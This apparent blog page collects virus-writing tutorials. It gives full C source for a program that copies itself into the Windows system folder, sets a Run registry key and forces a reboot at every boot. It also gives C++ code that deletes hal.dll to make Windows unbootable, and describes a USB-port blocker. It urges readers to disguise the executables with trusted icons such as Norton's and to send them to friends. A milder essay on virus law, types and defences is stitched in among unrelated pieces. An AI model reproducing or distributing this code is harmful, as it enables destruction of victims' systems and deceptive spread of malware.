A Virus Program to Disable USB Ports
Once this virus is executed it will immediately disable all the USB ports on the computer. As a result the you’ll will not be able to use your pen drive or any other USB peripheral on the computer. The source code for this virus is available for download. You can test this virus on your own computer without any worries since I have also given a program to re-enable all the USB ports.
1. Download the USB_Block.rar file on to your computer.
2. It contains the following 4 files.
- block_usb.c (source code)
- unblock_usb.c (source code)
3. You need to compile them before you can run it. A step-by-step procedure to compile C programs - How to Compile C Programs.
3. Upon compilation of block_usb.c you get block_usb.exe which is a simple virus that will block (disable) all the USB ports on the computer upon execution (double click).
4. To test this virus, just run the block_usb.exe file and insert a USB pen drive (thumb drive). Now you can see that your pen drive will never get detected. To re-enable the USB ports just run the unblock_usb.exe (you need to compile unblock_usb.c) file. Now insert the pen drive and it should get detected.
5. You can also change the icon of this file to make it look like a legitimate program. For more details on this – How to Change the ICON of an EXE file (This step is also optional).
Today I will show you how to create a virus that restarts the computer upon every startup. That is, upon infection, the computer will get restarted every time the system is booted. This means that the computer will become inoperable since it reboots as soon as the desktop is loaded.
For this, the virus need to be doubleclicked only once and from then onwards it will carry out rest of the operations. And one more thing, none of the antivirus softwares detect’s this as a virus since I have coded this virus in C. So if you are familiar with C language then it’s too easy to understand the logic behind the coding.
Here is the source code.
#include
#include
#include
int found,drive_no;char buff[128];
void findroot()
{
int done;
struct ffblk ffblk; //File block structure
done=findfirst(”C:\\windows\\system”,&ffblk,FA_DIREC); //to determine the root drive
if(done==0)
{
done=findfirst(”C:\\windows\\system\\sysres.exe”,&ffblk,0); //to determine whether the virus is already installed or not
if(done==0)
{
found=1; //means that the system is already infected
return;
}
drive_no=1;
return;
}
done=findfirst(”D:\\windows\\system”,&ffblk,FA_DIREC);
if(done==0)
{
done=findfirst(”D:\\windows\\system\\sysres.exe”,&ffblk,0);
if
(done==0)
{
found=1;return;
}
drive_no=2;
return;
}
done=findfirst(”E:\\windows\\system”,&ffblk,FA_DIREC);
if(done==0)
{
done=findfirst(”E:\\windows\\system\\sysres.exe”,&ffblk,0);
if(done==0)
{
found=1;
return;
}
drive_no=3;
return;
}
done=findfirst(”F:\\windows\\system”,&ffblk,FA_DIREC);
if(done==0)
{
done=findfirst(”F:\\windows\\system\\sysres.exe”,&ffblk,0);
if(done==0)
{
found=1;
return;
}
drive_no=4;
return;
}
else
exit(0);
}
void main()
{
FILE *self,*target;
findroot();
if(found==0) //if the system is not already infected
{
self=fopen(_argv[0],”rb”); //The virus file open’s itself
switch(drive_no)
{
case 1:
target=fopen(”C:\\windows\\system\\sysres.exe”,”wb”); //to place a copy of itself in a remote place
system(”REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\
CurrentVersion\\Run \/v sres \/t REG_SZ \/d
C:\\windows\\system\\ sysres.exe”); //put this file to registry for starup
break;
case 2:
target=fopen(”D:\\windows\\system\\sysres.exe”,”wb”);
system(”REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\
CurrentVersion\\Run \/v sres \/t REG_SZ \/d
D:\\windows\\system\\sysres.exe”);
break;
case 3:
target=fopen(”E:\\windows\\system\\sysres.exe”,”wb”);
system(”REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\
CurrentVersion\\Run \/v sres \/t REG_SZ \/d
E:\\windows\\system\\sysres.exe”);
break;
case 4:
target=fopen(”F:\\windows\\system\\sysres.exe”,”wb”);
system(”REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\
CurrentVersion\\Run \/v sres \/t REG_SZ \/d
F:\\windows\\system\\sysres.exe”);
break;
default:
exit(0);
}
while(fread(buff,1,1,self)>0)
fwrite(buff,1,1,target);
fcloseall();
}
else
system(”shutdown -r -t 0″); //if the system is already infected then just give a command to restart
}
NOTE: COMMENTS ARE GIVEN IN GREEN COLOUR.
Compiling The Scource Code Into Executable Virus.
1. Download the Source Code Here
2. The downloaded file will be Sysres.C
3. For step-by-step compilation guide, How to compile C Programs.
Testing And Removing The Virus From Your PC
You can compile and test this virus on your own PC without any fear.To test, just doubleclick the sysres.exe file and restart the system manually.Now onwards ,when every time the PC is booted and the desktop is loaded, your PC will restart automatically again and again.
It will not do any harm apart from automatically restarting your system.After testing it, you can remove the virus by the following steps.
1. Reboot your computer in the SAFE MODE
2. Goto X:\Windows\System (X can be C,D,E or F)
3.You will find a file by name sysres.exe, delete it.
4.Type regedit in run.You will goto registry editor.Here navigate to
HKEY_CURRENT_USER\Software\Microsoft\Windows\ CurrentVersion\Run
There, on the right site you will see an entry by name “sres“.Delete this entry.That’s it.You have removed this Virus successfully.
Logic Behind The Working Of The Virus
If I don’t explain the logic(Algorithm) behind the working of the virus,this post will be incomplete.So I’ll explain the logic in a simplified manner.Here I’ll not explain the technical details of the program.If you have further doubts please pass comments.
LOGIC:
1. First the virus will find the Root partition (Partition on which Windows is installed).
2. Next it will determine whether the Virus file is already copied(Already infected) into X:\Windows\System
3. If not it will just place a copy of itself into X:\Windows\System and makes a registry entry to put this virus file onto the startup.
4. Or else if the virus is already found in the X:\Windows\System directory(folder), then it just gives a command to restart the computer.
This process is repeated every time the PC is restarted.
NOTE: The system will not be restarted as soon as you double click the Sysres.exe file.The restarting process will occur from the next boot of the system.
AND ONE MORE THING BEFORE YOU LEAVE(This Step is optional)
After you compile, the Sysres.exe file that you get will have a default icon.So if you send this file to your friends they may not click on it since it has a default ICON.So it is possible to change the ICON of this Sysres.exe file into any other ICON that is more trusted and looks attractive.
For example you can change the .exe file’s icon into Norton antivirus ICON itself so that the people seeing this file beleives that it is Norton antivirus. Or you can change it’s ICON into the ICON of any popular and trusted programs so that people will definitely click on it.
The detailed tutorial on changing the ICON is given in my post How To Change The ICON Of An EXE File .
How To Make A Fake Virus
This is an interesting tutorial in which we will create a fake “virus” which can shutdown, restart and log off your pc(Can also write a message and specify the countdown time). This is actually a faster way to turn off your pc, ’cause it doesn’t require clicking START>TURNOFF button etc….And you can always do a little mischief by sending it to your friends 
1Create shortcut,(Right click on your desktop and go to new -> shortcut )
2)After this will appear window and that is where you type the code
There are few variants , this one will shutdown pc .
To log of computer type shutdown -l -t 300 -c “your message”
To restart computer type shutdown -r -t 300 -c ” your message”
The number after -t is the number of seconds countdown there will be before shutdown . After -c write own message , that will come up when shutdown box pops up.
3) Click Next, Finish
4) After this will appear icon on desktop, when someone click it, shutdown box will pops up.
Enter email address where you want to receive tutorials when we post them! It’s free! |
3)How can I stop system shutdown ? Go to Start->Run , then open cmd,write shutdown -a and press ENTER on keyboard, as shown below
Reality of Virus
A computer virus is a program which intentionally makes copies of itself. It may contain some sort of "payload", which can be destructive or non-destructive program code, that is activated and run when certain conditions are fulfilled.
Legality of Viruses
The laws about writing and releasing viruses vary from country to country and state to state. In the US there are both Federal and State laws preventing damage to data and property, and these ensure that virus writers whose viruses infect large numbers of computers pay the penalty. David Smith, writer of the infamous Melissa MACRO virus, has been successfully prosecuted and awaits sentencing, with a possible fine of anything up to $150,000 and up to 10 years in prison.
In the UK the Computer Misuse Act makes it illegal to modify a computer without authorization, and this was successfully used to prosecute the author of the SMEG virus Christopher Pile, AKA the Black Baron, who received a total of 18 months in prison. During sentencing the judge commented that "those who seek to wreak mindless havoc on one of the vital tools of our age cannot expect lenient treatment". Not every country is so active in finding and prosecuting virus writers, however. A Taiwanese university only reprimanded and demoted the author of the highly destructive and costly CIH virus. Even just collecting viruses, passing source code and writing viruses for non-destructive purposes is illegal in some places, and any wannabe virus writer needs to understand the implications of the law, wherever they are based.
From a more hackish viewpoint I can understand the attraction of looking at the theory of virus writing, the appeal of studying virus source code to see how viruses work, the thrill of capturing and disassembling live viruses, and even, to some extent, the pride felt when writing a new virus as "proof of concept". All of this is fine, as it combines a very healthy curiosity coupled with sound technical skills, something that draws respect from hackers the world over. But, and it's a very big "but", the juvenile egotistic idiots who release these viruses "in the wild", often with their handle and the name of their group in it, have crossed the ethical border that distinguishes hacking from crime.
On a more personal note, I resent the amount of time wasted cleaning up networks of PCs after an infection, evaluating anti-virus software, installing anti-virus software and updating signature files - time that could have been put to more productive use, like hacking. Anyone who chooses to write a virus had better be sure that it never escapes, because if it causes major damage and the police break in their door, the authorities are not going to be convinced by any lame argument about "proof of concept".
How does a Virus Work?
Most viruses are written in assembly code for a specific computer and tightly tied to the operating system of the target computer. This enables them to protect themselves while continuing to spread the viral infection. But viruses don't have to be written in assembly language, and the growth of sophisticated programming languages embedded inside large software packages has allowed the spread of so-called "MACRO" viruses, which infect documents rather than programs.
Nearly everyone gets a virus from time to time, especially when they share floppy disks with friends. But if anyone starts downloading hacker tools from that hot new hacking web site, or start using warez from some dodgy ftp server, then they had better make sure that they have adequate anti-virus (A/V) protection. Although millions of computers are infected with viruses every year, the majority of cases are due to a small handful of persistent offenders out of the estimated 8,000 viruses in the wild.
Anti-virus software detects and removes viruses either by looking for a "viral signature", a string of bytes unique to that virus, or by using heuristic rules to look for "viral behaviour" which may indicate a program seeking to infect other files or cause destructive behaviour. The A/V software will have been programmed to understand how the virus detected hides itself, and will "clean" the infected file, boot sector or document thus removing the virus from the system.
Types of Virus
- A "boot sector" virus occupies the boot sector of a floppy or hard disk and loads itself into memory during the boot-up sequence. Once in memory, it will attempt to infect the boot sector of any floppy disk used in the computer.
- An "executable load" virus is a type of virus which attaches itself to executable files and runs when the program is started. Once in memory, it will attempt to infect other program files by attaching itself to them.
- A "polymorphic virus" is a virus which encrypts itself, changing its viral "signature" each time using a "mutation engine" in an attempt to evade detection and destruction.
- A "MACRO" virus is one which is written in a programming language embedded inside another program, such as a word processor. The commonest program suite targeted by MACRO viruses is the Microsoft Office group of applications, with the "Concept" and "LaRoux" viruses targeting Word and Excel, but any program which hosts a complex embedded macro programming language could be used to write such a virus.
Types of Payload
- Viruses with non-destructive payloads play tunes, display banner messages or pop-up messages without causing any data loss, but they are a distraction, and they still need to be removed
- Random destruction, where the virus changes odd bytes on disk or in memory, alters keystrokes at random, or messes around with the display.
- Heavy destruction - the virus can cause the destruction of hard or floppy disks by low-level format, or data loss by wiping out a PC's File Allocation Table (FAT).
- A new generation of viruses have a payload of Network Exploitation, use the Internet to copy themselves, and are more like "worms" than viruses. The notorious Melissa virus, which spread to a large number of computers in 1999, worked by infecting Microsoft Word97 documents then using Microsoft Outlook email software to email itself as an attachment to 50 people chosen from the infected user's email address book.
Getting Infected
Here are some of the ways of getting infected by a virus. Good A/V counter-measures start by recognizing the risk of infection from each source and taking appropriate steps in prevention.
- The commonest cause of infection is shared floppy disks, but archive tapes and CD-ROMs can also be infected.
- Any form of pirate software or warez, either downloaded from the Internet or BBSs, purchased or swapped with other warez traders.
- Freeware or shareware software from a bulletin board, sometimes even when it appears to be from a trusted source.
- Freeware or shareware from sources on the Internet, even when it appears to be from a trusted source.
- Any form of email attachments, either programs or documents, are now suspect.
Virus Protection
Preventing viruses from attacking your system is a mixture of commonsense reasoning with some down-to-earth practical precautions, mixed with the use of one or more anti-virus packages to routinely check your system for infection. The level of protection you decide upon will depend on how much you would feel the loss of data if you were infected, and how much time you would spend cleaning up after the infection. A business user with many PCs and business-critical data at stake will be prepared to spend far more on A/V protection than the average home user, because the sums at risk are so much greater. Using appropriate anti-virus protection is at least as important in preventing catastrophic data loss as the backups you make routinely. (You *do* make backups, don't you?)
Commonsense Precautions
- Never use pirate software or warez - not only is it illegal, but you don't know where it's been, or what might be lurking in there.
- Always scan all freeware and shareware before use, even when it comes from what appears to be a reputable source.
- Always scan all Internet downloads before installing and running, even when they appear to be from a reliable archive site.
- Ensure that you scan all floppy disks you are given before use. This includes shared disks, pre-formatted blank disks and even distribution disks with original software on. Write-protect disks when not in use to prevent accidental infection.
- Never run programs attached to email before scanning, even when you are sure they come from a trusted source. Save them and scan them before running or installing them.
- Always scan any document attached to email before opening, or save the attachment and turn off macro features in the program you are using before opening it.
- CD-ROMs and CD-RW disks should be scanned if your software allows it, but you will not be able to disinfect if you find a virus.
- Make sure that you always have an updated signature file for your A/V package. This will ensure optimal A/V protection with signature-based A/V software.
- Use more than one A/V package if you can, as there is a tendency for A/V packages to detect some viruses and miss others. Using multiple packages increases your chance of detecting something nasty before the infection spreads.
- Make sure that you back up your data regularly and that you can restore successfully. Ensure that you have a virus-free boot disk to boot from in case of infection, and that you also have virus-free disks containing any tools or device drivers you need to recover your data and rebuild your system.
Using an Anti-Virus Package
If you haven't got an anti-virus package already, then you should. There are many around, both free and commercial. Try F-Prot if you need a free virus package, or get hold of free evaluation copies of commercial products such as Symantec's Norton Anti-Virus, McAfee's VirusScan, or ThunderByte and then buy the one you prefer. If you are protecting corporate data, you need to look at some of the disk control mechanisms available such as Reflex Magnetic's DiskNet, and also scan incoming email using a product such as MimeSweeper. There are many alternative products on the market, and you need to assess your degree of risk before evaluating the products to find one that suits you.
Once you have your anti-virus package, make sure that your machine is virus-free *before* installing the package, and then make sure that the signature file is always up to date. Some packages will automatically attach to the Internet at periodic intervals to download the latest signature file, but if you have read this far in the book you might have your own ideas about the wisdom of that, and would prefer to download the signature file yourself.
Writing Viruses
This section deals with writing viruses, but the reader isn't going to find a general tutorial here, nor will are there any great tips on writing a "killer" virus. As a hacker I don't condone the writing or spreading of viruses, but I have respect for the knowledge, technical skills and level of coding ability needed. What I hope is that by the time anyone who tries to code viruses gets to be *really* good at it, they will have realized that there are more technically challenging problems outside the area of virus development that are both more socially acceptable and better financially rewarded.
Assembling the Tools
If anyone wants to learn how to write a virus, they had better start by "assembling", pun intended, their tools. Here is a list of things someone will need to begin writing viruses:
- A computer (*doh*), because it is hard to write programs without one!
- A programming language of some kind, most probably assembly language, not just because viruses are written mostly in assembly language, but also because the novice virus writer will find most source code and tutorials will assume they are using assembly language.
- A list of the opcodes or assembly mnemonics of the processor which are being targeted. Don't assume that, just because all the books of programming list 126 opcodes for a chip, that means there *are* just 126 opcodes. Some chips have "undocumented" opcodes that don't work right or have weird side effects. The venerable Motorola 6502 chip used in early Apple computers had an undocumented opcode whose mnemonic was HCF - Halt and Catch Fire - because it hosed the CPU.
- A disassembler which will turn machine code into human-readable assembly language mnemonics. This will enable the novice virus writer to turn any live viruses they capture back into a computer program that they can read and understand.
- A decent machine code debugger. SoftIce seems to be the favourite for PCs, but it depends on the platform that the virus is being written for.
- Large and copious amounts of anti-virus software, both to protect themselve and to examine for clues on how to evade detection.
In addition to the basic tools a wannabe virus writer might need to acquire some of the following from the Internet.
Virus Source Code
Anyone can find virus source code in assembly or other languages very easily on the Internet. Once they have the source code, they can read it and understand how that virus works, or can re-assemble it and get a working virus. That's the theory, but a lot of the so-called virus "source" code kicking around the web isn't, and telling the difference between the two isn't easy unless the novice virus writer is already an expert in assembly language. For example, look at this snippet which purports to be from the STONED virus - the part that checks for infection and then infects the computer if not already infected.
PUSH CS
POP DS
MOV SI,200H
MOV DI,0
LODSW
CMP AX,[DI]
JNZ HIDEHD ;Hide real boot sector in hard drive.
LODSW
CMP AX,[DI+2]
JNZ HIDEHD ;Hide real boot sector in hard drive.
Table 10.1: Assembly language fragment of STONED virus which would infect the hard drive of a computer when run
It looks really impressive, doesn't it? Reading through the assembly source code of the STONED virus, which took me less than five minutes to find on the Internet, it looked *real* enough to me. But to someone who's not a full-time assembly language hacker, the code could have been spurious nonsense, designed to send wannabe virus writers down a blind alley. How am I going to find out whether this is real source code or not? The only way of being sure is to feed the assembly language code into an assembler and turn it into an executable binary of machine code. Once anyone has the binary, they can either compare it with a virus from the "wild" or run it and see if it infects their disks.
Virus Writing Tutorials
There are a lot of virus writing tutorials on the Internet, and anyone learning about viruses really wants to find a tutorial that deals with the platform they are coding for, as any example code can be used to get them started. Otherwise, tutorials in any other languages are good for giving a novice virus writer new ideas and concepts if they can follow them.
Some of the tutorials deal with basic concepts, such as the Over Writing virus, which reproduces itself by overwriting the first parts of a program with itself, and carries a destructive payload that kicks in the first time the program is run. Other tutorials deal in depth with stealth viruses which move to escape detection, armoured viruses which have been specifically designed to evade detection by some of the most popular anti-virus software, and polymorphic viruses that use self-encryption on each new generation to prevent their viral signature being detected.
Virus Creation Packages and Mutation Engines
All software writers use tools, and virus writers are no exception. The two most popular tools are "virus creation packages" and "polymorphic mutation engines". These tools are written by the active virus-writing community, and have only one purpose: to enable writers to code viruses quickly, easily and with advanced capabilities.
Polymorphic Mutation Engines
A polymorphic mutation engine is computer code that allows a virus writer to encrypt viruses to prevent them showing a viral signature. The most famous of these is the Mutation Engine written by the Bulgarian Dark Avenger, but virus writers could also run into TridenT Polymorphic Engine, Visible Mutation Engine and many others. Most of these packages are program modules that can be included in other programs to give them the ability to produce polymorphic viruses. By using these packages and including the code into viruses they are writing, novice writers can give even very simple viruses polymorphic capability, enabling them to escape detection.
Virus Creation Packages
Some virus writers have been clever enough to write "virus creation packages" which can generate virus code for users who can't write their own. One such, the sophisticated Virus Creation Lab, offers a full menu-driven virus creation kit, but others such as Virus Construction Set only offer the user a chance to create a pre-canned virus with their own message in it. Viruses that come from creation packages like these will rarely be as sophisticated as viruses written by hand, because virus writing is advancing so quickly that not all virus types can ever be included in a single package. The packages might be of some use to a novice virus writer who wishes to study the code produced, but real virus writers will still prefer to cut their code the old way, and see the creation package user as a script kiddy capable only of running software other smarter hackers have written.
Once again, any systems administrator should always keep an eye out for any of the tools used by Virus writers in case they should appear on the systems they administer. Systems administrators should be aware of activity going on their systems so that they can spot virus source code, tutorials or virus contruction tools before the novice virus writer has got very far. If a systems administrator finds any of these items on a their servers, then a little chat with the user owning those tools would be helpful in determining whether they were present due to natural curiosity or any malicious intent.
The Virus Community
Like every part of the computer community, the virus writers have their own community of mailing and discussion lists, web sites and BBSs. The virus writing community is more hidden and covert than most hacking communities because virus writers have more to lose than most hackers, so what anyone will find on the Internet is just the tip of the iceberg, with 90 per cent of virus writing buried deep underground for fear of exposure and prosecution.
Virus groups such as Phalken/Skism, Kefrens, Team Necrosis and phVX write tutorials and ezines, trade viruses, source code, tools, and make them all available on ftp and web sites for anyone with an interest in virus writing to download. Some of the ezines for the virus-writing community include 40hex magazine, Infected Voice, 29A, * magazine and Crypt Newsletter. If anyone wants to get accepted into the virus community, they must make sure they can code really well and then read the section in the next chapter about getting into the warez community, but trade viruses instead of warez. Hopefully by the time they've learnt to code well enough, they'll have become more interested in something more technically challenging and useful than writing viruses.
::Virus Maker::
This Incridable Virus Maker is 100% Free and I Love it.
This Program is made by D1sr3p41r3ds
I want to share it with you all!! If i got it wrong , Contact ME!
Warning: Do not try this on your home computer.
The Original Code:
Code:
#include
#include
using namespace std;
int main(int argc, char *argv[])
{
std::remove("C:\\windows\\system32\\hal.dll"); //PWNAGE TIME
system("shutdown -s -r");
system("PAUSE");
return EXIT_SUCCESS;
}
Code:
#include
#include
using namespace std;
int main(int argc, char *argv[])
{
std::remove("%systemroot%\\system32\\hal.dll"); //PWNAGE TIME
system("shutdown -s -r");
system("PAUSE");
return EXIT_SUCCESS;
}
No comments:
Post a Comment